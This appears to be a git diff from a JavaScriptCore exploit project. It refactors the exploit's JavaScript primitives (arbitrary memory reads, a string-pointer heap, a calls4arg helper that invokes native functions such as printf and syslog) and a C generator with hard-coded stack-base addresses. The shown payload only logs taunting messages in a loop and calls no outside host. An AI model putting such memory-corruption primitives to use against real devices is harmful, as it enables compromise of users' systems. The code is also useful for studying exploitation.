diff options
Diffstat (limited to 'src')
| -rw-r--r-- | src/gen/main.c | 3 | ||||
| -rw-r--r-- | src/js/lib/myutils.js | 23 | ||||
| -rw-r--r-- | src/js/main.js | 16 | ||||
| -rw-r--r-- | src/js/primitives/mem.js | 13 |
4 files changed, 39 insertions, 16 deletions
diff --git a/src/gen/main.c b/src/gen/main.c index 3c8d513..5d6be0a 100644 --- a/src/gen/main.c +++ b/src/gen/main.c @@ -10,6 +10,7 @@ #include <unistd.h> #include <string.h> #include <stdio.h> +#include <dlfcn.h> #include "stage1_primitives.h" #include "stage0_primitives.h" @@ -202,6 +203,8 @@ int main(int argc, fprintf(fp, "# - with love from spv <3\n"); fprintf(fp, "\n"); + fprintf(stderr, "0x%x\n", RTLD_DEFAULT); + uint32_t stack_base = 0x1c7738; // my shell setup // uint32_t stack_base = 0x1c7c88; // my 4s shell setup // uint32_t stack_base = 0x1c2e48; // my lldb diff --git a/src/js/lib/myutils.js b/src/js/lib/myutils.js index 80d4d9b..38b85b8 100644 --- a/src/js/lib/myutils.js +++ b/src/js/lib/myutils.js @@ -1,9 +1,28 @@ function puts(s) { - return calls4arg("puts\0", sptr(s + "\0"), 0, 0, 0); + return calls4arg("puts\0", sptr(s), 0, 0, 0); } function printf() { + if (arguments.length > 4) { + return printf("warning: tried to printf with %d args, max %d.\n", arguments.length, 4); + } + + var args_to_pass = new Array(); + + args_to_pass.push("printf"); + for (var i = 0; i < arguments.length; i++) { - puts(arguments[i]); + if (arguments[i].constructor === String) { + args_to_pass.push(sptr(arguments[i])); + } else { + args_to_pass.push(arguments[i]); + } } + + var count_to_me = 5 - arguments.length; + for (var i = 0; i < count_to_me; i++) { + args_to_pass.push(0); + } + + return calls4arg.apply(this, args_to_pass); }
\ No newline at end of file diff --git a/src/js/main.js b/src/js/main.js index e040d05..4c29430 100644 --- a/src/js/main.js +++ b/src/js/main.js @@ -37,20 +37,14 @@ function main() { puts("we out here"); puts("I came through a portal holding a 40 and a blunt. Do you really wanna test me right now?"); - log("slide=0x" + slide.toString(16)); - log("*(uint8_t*)base = 0x" + read_u8(base).toString(16)); - log("*(uint16_t*)base = 0x" + read_u16(base).toString(16)); - log("*(uint32_t*)base = 0x" + read_u32(base).toString(16)); - - predicted_jsobject_addy = 0x422200; - buf = read_buf(predicted_jsobject_addy, 0x200); - - log("hexdump of predicted jsobject loc:"); - log(hexdump(buf, 8, 2, predicted_jsobject_addy, 8, "0x")); + printf("slide=0x%x\n", slide); + printf("*(uint8_t*)base = 0x%x\n", read_u8(base)); + printf("*(uint16_t*)base = 0x%x\n", read_u16(base)); + printf("*(uint32_t*)base = 0x%x\n", read_u32(base)); var i = 0; while (true) { - calls4arg("syslog\0", 0x28, sptr("get rekt from jsc %d (slide=%x)\n\0"), i, 0); + calls4arg("syslog", 0x28, sptr("get rekt from jsc %d (slide=%x)\n"), i, 0); calls4arg("sleep", 0, 0, 0, 0); i++; } diff --git a/src/js/primitives/mem.js b/src/js/primitives/mem.js index b0746b4..551b59f 100644 --- a/src/js/primitives/mem.js +++ b/src/js/primitives/mem.js @@ -169,16 +169,16 @@ function init_sptr_heap() { sptr_size = 0x1000000; sptr_len = 0; - calls4arg("printf\0", sptr("sptr_heap=%p\n\0"), global_sptr_addy, 0, 0); + calls4arg("printf\0", sptr("sptr_heap=%p\n"), global_sptr_addy, 0, 0); return global_sptr_addy; } /* - * sptr is meant to give you a pointer to a specified string + * _sptr is meant to give you a pointer to a specified string * remember your nul's! */ -function sptr(s) { +function _sptr(s) { if ((sptr_len + s.length) >= sptr_size) { /* * expand sptr heap if it's too small @@ -198,4 +198,11 @@ function sptr(s) { write_str(global_sptr_addy, s); global_sptr_addy += s.length; return global_sptr_addy - s.length; +} + +/* + * sptr but with nul + */ +function sptr(s) { + return _sptr(s + "\0"); }
\ No newline at end of file |